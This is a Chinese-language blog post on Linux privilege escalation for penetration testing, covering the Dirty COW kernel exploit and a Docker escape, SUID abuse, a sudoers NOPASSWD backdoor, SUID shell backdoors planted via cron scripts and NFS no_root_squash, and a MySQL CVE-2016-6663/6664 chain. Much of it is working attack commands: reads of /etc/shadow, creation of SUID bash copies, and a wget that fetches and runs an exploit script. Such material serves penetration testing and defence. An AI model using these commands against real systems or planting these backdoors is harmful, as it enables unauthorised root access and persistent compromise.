Linux提权的几种常用姿势

在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。

1、内核漏洞提权

提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,同时可以通过该漏洞实现Docker容器逃逸,获得root权限的shell。

1.1 本地内核提权
(1)检测内核版本

# 查看系统发行版本
lsb_release -a
# 查看内核版本
uname -a

(2) 下载,编译生成exp文件

bypass@ubuntu:~$ make
bypass@ubuntu:~$

(3)执行成功,返回一个root权限的shell。

1.2 利用DirtyCow漏洞实现Docker逃逸

(1)进入容器,编译POC并执行:

(2)在攻击者机器上,成功接收到宿主机反弹的shell。

1.3 Linux提权辅助工具

github项目地址:

https://github.com/mzet-/linux-exploit-suggester.git
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

(1)根据操作系统版本号自动查找相应提权脚本

(2)根据提示下载poc,编译执行。

2、利用SUID提权

SUID是一种特殊权限,可以让调用者在执行过程中暂时获得该文件拥有者的权限。如果可以找到并运行root用户所拥有的SUID的文件,那么就可以在运行该文件的时候获得root用户权限。
(1)在Linux中查找可以用来提权的SUID文件

find / -perm -u=s -type f 2>/dev/null


(2)通过find以root权限执行命令

可用作Linux提权的命令及其姿势:

#Find
find pentestlab -exec whoami \;
#Vim
vim.tiny /etc/shadow
#awk
awk 'BEGIN{system("whoami")}'
#curl
curl file:///etc/shadow
#Bash
bash -p  
#Less
less /etc/passwd
#Nmap
nmap --interactive

3、SUDO提权

普通用户在使用sudo执行命令的过程中,会以root方式执行命令。在很多场景里,管理员为了运维管理方便,sudoer配置文件错误导致提权。

(1)设置sudo免密码

$vi /etc/sudoers
在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2)查看sudo的权限

4、计划任务

如果可以找到可以有权限修改的计划任务脚本,就可以修改脚本实现提权。本质上,就是文件权限配置不当。

(1)查看计划任务,找到有修改权限的计划任务脚本

ls -l /etc/cron*
more /etc/crontab

(2)在mysqlback.sh 添加 SUID shell后门,当定时任务以root再次执行的时候,可以获取root权限

cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

5、NFS提权

当服务器中存在NFS共享,开启no_root_squash选项时,如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。

(1)查看NFS服务器上的共享目录

sudo showmount -e 10.1.1.233

(2)创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。

sudo mkdir -p /tmp/data
sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
cp /bin/bash /tmp/data/shell
chmod u+s /tmp/data/shell

(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。

6、MySQL提权

MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

(2)利用CVE-2016-6664将Mysql权限提升为root权限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log

posted @ 2021-01-11 20:27  Bypass  阅读(14932)  评论(0编辑  收藏  举报